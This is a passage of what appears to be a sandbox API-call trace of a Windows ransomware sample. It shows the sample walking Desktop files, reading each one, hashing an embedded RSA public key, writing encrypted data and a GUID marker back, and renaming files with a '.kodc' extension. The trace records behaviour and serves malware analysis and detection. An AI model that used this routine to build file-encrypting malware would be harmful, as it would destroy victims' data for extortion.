dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5b78 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.861] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x1451d, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x1451d, lpOverlapped=0x0) returned 1 [0100.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.862] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14522, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.862] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.862] CloseHandle (hObject=0x5cc) returned 1 [0100.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.864] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\gxHYHDN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\gxhyhdn.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\gxHYHDN.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\gxhyhdn.mp3.kodc")) returned 1 [0100.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.866] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0100.867] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74453210, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x11276420, ftLastAccessTime.dwHighDateTime=0x1d5bf2f, ftLastWriteTime.dwLowDateTime=0x11276420, ftLastWriteTime.dwHighDateTime=0x1d5bf2f, nFileSizeHigh=0x0, nFileSizeLow=0x174c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J12HLygy.wav", cAlternateFileName="")) returned 1 [0100.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0100.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.867] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\J12HLygy.wav") returned=".wav" [0100.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\J12HLygy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\j12hlygy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.867] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=95431) returned 1 [0100.867] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.870] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x174a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.870] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.871] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.871] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x174c7, lpOverlapped=0x0) returned 1 [0100.872] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.872] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.872] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.872] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.873] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.873] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.873] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.873] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.873] GetLastError () returned 0x0 [0100.873] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.873] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.873] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.873] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.873] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x174d0) returned 0x9bb8968 [0100.873] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5b78 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5bc0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ec0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.874] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ed8 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ec0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.875] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x174c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.875] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.875] CloseHandle (hObject=0x5cc) returned 1 [0100.884] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\J12HLygy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\j12hlygy.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\J12HLygy.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\j12hlygy.wav.kodc")) returned 1 [0100.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.885] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0100.886] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb5eab0, ftCreationTime.dwHighDateTime=0x1d5b917, ftLastAccessTime.dwLowDateTime=0x24543a50, ftLastAccessTime.dwHighDateTime=0x1d5c399, ftLastWriteTime.dwLowDateTime=0x24543a50, ftLastWriteTime.dwHighDateTime=0x1d5c399, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LSUYyXvsq.png", cAlternateFileName="LSUYYX~1.PNG")) returned 1 [0100.886] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\LSUYyXvsq.png") returned=".png" [0100.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\LSUYyXvsq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\lsuyyxvsq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.886] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=84136) returned 1 [0100.886] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.889] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14882, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.889] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.890] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.890] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x148a8, lpOverlapped=0x0) returned 1 [0100.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.891] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.892] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.892] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.892] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.892] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.892] GetLastError () returned 0x0 [0100.892] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.892] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.892] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.892] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.892] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148b0) returned 0x9bb8968 [0100.893] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5bc0 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c08 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 